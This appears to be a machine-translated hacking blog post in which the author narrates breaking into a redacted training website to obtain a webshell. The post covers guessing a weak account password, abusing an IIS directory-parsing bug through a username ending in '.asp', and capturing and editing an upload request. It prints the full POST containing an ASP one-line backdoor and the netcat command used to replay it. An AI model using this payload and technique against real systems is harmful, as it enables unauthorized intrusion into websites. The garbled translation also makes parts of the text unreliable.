Recorded about this time is how to capture-on change pack-of uploaded-of to get to the WEBSHELL. After careful analysis, this website from either the main station or sub-Station does not exist any injection vulnerability is, of course, this site needless to say use MSSQL Data, and also cannot find the ACCESS database the download, but did not find the Admin page.
! [clip_image001](/Article/UploadPic/2009-8/2 0 0 9 8 1 6 2 0 1 7 3 1 7 3. gif? imgmax=8 0 0) Then register a user go in and see the inside of the registration total can choose 3 types of users: the ordinary members, instructor members, institutional members. The time of registration on the web page there are prompts which roles have what permissions. 3 I have to register once, the analysis results of the ordinary members and the instructor members are not a possibility, the institutional members can upload training materials, however, registration is required after manual review, it is estimated that it's over. Visit his website and then then visiting the forums, the Forum is used DVBBS8. 0 version, as far as is MSSQL or ACCESS temporarily don't know, but from feeling, should be to ACCESS the database. BBS admin can access, the default database name is change, the default administrative account and password Login failed. DVBBS8. 0 remote injection vulnerability also failed. So far, I think this Station is really invincible The for me to. Then throw it to someone else to study, I did not expect not over 2 hours, he will get to WEBSHEL, of course they didn't tell me how to get hold of, because we do not recognize. Me~funny Ah, I'm not that weak, right? How is it possible someone else can get I'm not? I wasn't there what did not expect? Hasten to reflect on what... Analysis to analyze go, I think the problem still lies in institutional members that inside, but after registration also give 2 to 4 hours artificial audit, he could not have 2 hours to get the...to observe a moment, have a little discovery: some of the pages where the URL is similar to this format: http://www.xxxx.com/xxx/*/index. asp Wherein*represents some of the very irregular character, and a careful analysis under the discovery of these characters is the registered username! O(∩_∩)O ha ha~there is no thought of a point what? Well the first place we behind. From the inside we also know some have been through the audit of the organization name, then we guess a guess there is no weak passwords, such as username and password., the password is 1 2 3 4 5 6 Ah or something.
After several try, finally I found a username and password the same. Logged in After, and found there two can upload a document, the first is to change their corporate LOGO, and the other is that you can upload course-related pictures. The first filter is strict, the second after the test found that the above transmission gear processing gear has been removed, the inside my guess is that 2 hoursinvasiongo in the people do. So for me the only hope is to send Please in the first place, the filter more stringent, then on the first pass a normal image file see the return of what effect it. After a successful upload returns a path like this: UploadImg//20081010201.jpg This inside therepresents is still a registered username! O(∩_∩)O haha~then combined with the above small found, is not it more interesting? We can register a username after the third bit is“. asp”, then a picture up, because IIS parsing BUG, this. asp user name directory where all files are to be parsed to the asp and performs. But just the registration of the institutional members not to audit? Not just have waited? Well, at first I also thought so, but after testing I found that as long as registered, regardless of whether the audit will create that directory. Well, the idea has been clear, it is time the practice. In the upload LOGO that inside right keys to view the original document, the search action finds its value like this: uppic. asp? picurl=pic&file_ad=UploadImg/* The inside of theyou do not need me to explain again? Try this inside the user name changes to neeke. asp and the URL completion, then put this page Save to html, and then open this local html page to upload a tail code changed to jpg asp Backdoor, to upload the results is a fail! Is not to be crazy? Is this the theory and practice gap?
The next is today's theme, I don't know why it failed, but there is a surprise within. Re-upload at once instead of using the front of the local html and open WSockExpert capture.
Caught the kit as follows:
The following is quoted fragment: POST /upload/uppic. asp? picurl=pic&file_ad=UploadImg/* HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-silverlight, application/vnd. ms-excel, application/vnd. ms-powerpoint, application/msword, /* Referer: http://www.xxxxx.com/xxxx/upload/uppic.asp?picurl=pic&file_ad=UploadImg/** Accept-Language: zh-cn Content-Type: multipart/form-data; boundary=---------------------------7d89c6100702 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; . NET CLR 2.0.50727) Host: www.xxxxx.com Content-Length: 3 5 6 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDQCBQDTRD=CBDAOFCDOKNKAFBGOJIELFBL; StatUserID=; geturl=%2Fbbs%2Findex%2Easp%3Fboardid%3D19; upNum=0; cck_lasttime=1 2 2 7 7 9 1 1 5 1 3 2 8; cck_count=0; cnzz_a723913=1 4 8; vw=%3A21294148%3A56594595%3A24657327%3A74573309%3A50974716%3A50987662% 3A37122531%3A67808458%3A70586579%3A70604138%3A28852802%3A47119284%3A76191357%3A37126954%3A51284925%3A52364933%3A38661202% 3A74790164%3A70610751%3A72013662%3A73415389%3A76191358%3A49587472%3A43119978%3A-2 5 1 3 7 0 8 6 4%3A73388968%3A70611921%3A73384211% 3A32870242%3A37063863%3A32420673%3A53783557%3A72013663%3A65003880%3A70588081%3A66406723%3A57972621%3A73406321%3A60801952% 3A40826249%3A39695629%3A49578341%3A59386483%3A41111789%3A25224022%3A69210191%3A53796330%3A38456400%3A62172134%3A29259370% 3A36499102%3A46949182%3A32361261%3A31862738%3A79674658%3A34731608%3A102446092%3A36507283%3A81784150%3A86027646%3A81809181% 3A74781075%3A72012436%3A80383143%3A83227606%3A76186399%3A81784130%3A77581333%3A73399009%3A78982247%3A73385225%3A78982193% 3A88833998%3A87432179%3A74816111%3A; sin=-1; rtime=2; ltime=1 2 2 7 8 0 6 3 1 1 2 1 8; cnzz_eid=67318861-1227622346-; tab=4; Dvbbs=; ystat_bc_809970=2 8 7 6 4 4 4 4 8 9 1 1 2 4 1 9 3 0 3 5; ystat_ss_809970=26_1227833988_1259315693 -----------------------------7d89c6100702 Content-Disposition: form-data; name="FileName"; filename="D:\WEBSHELL\yjh.jpg" Content-Type: text/plain <% On Error Resume Next execute request("a") %> -----------------------------7d89c6100702 Content-Disposition: form-data; name="Submit" Upload a screenshot -----------------------------7d89c610 0 7 0 2--
The above information package in****changes to neeke. asp and save it as a txt to the same nc in a directory the name can be arbitrary,这 裏 为 neeke.txt in. Next, enter the DOS, in nc the directory where the input nc-vv www.xxxxx.com 8 0<neeke.txt Wait a few seconds it will return the data submitted results. This submission returns the results in the following diagram.
OK,get it! Hey Hey~~it seems I'll have to more careful analysis before yeah! Again there are cow X's technology, there is no good mind, you are also stupid cow one.